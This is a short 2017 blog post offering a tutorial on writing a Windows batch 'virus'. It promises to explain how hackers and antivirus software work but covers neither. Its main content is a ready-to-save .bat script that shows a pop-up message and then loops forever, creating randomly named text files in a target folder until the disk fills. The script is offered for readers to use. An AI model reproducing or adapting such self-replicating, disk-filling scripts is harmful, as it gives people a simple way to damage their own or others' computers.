Thursday, 23 March 2017

How To Create A Virus In Batch Programming

  No comments
Hello coder,
Main intention of posting this tutorial is to make you familiar with

1.How hackers create virus.
2.How Antivirus works.
3.A simple way to create virus.

Follow below steps to create a virus:
1.Create target folder i.e where you want your virus to attack. For demonstration i have created a folder called TEST under C.


C:\Test
2. This virus would create a endless number of text files in test folder.
3.Below is the code, and you need to save this file with extension of .bat

Watch Video

@echo off
color 0a
msg *You have just launched Gangs of coder virus %random% 
:codegeek 
echo This is Gangsofcoder #%random% >C:\Test\%random%%random%.virus.txt
goto codegeek

No comments :

Post a Comment

Loading...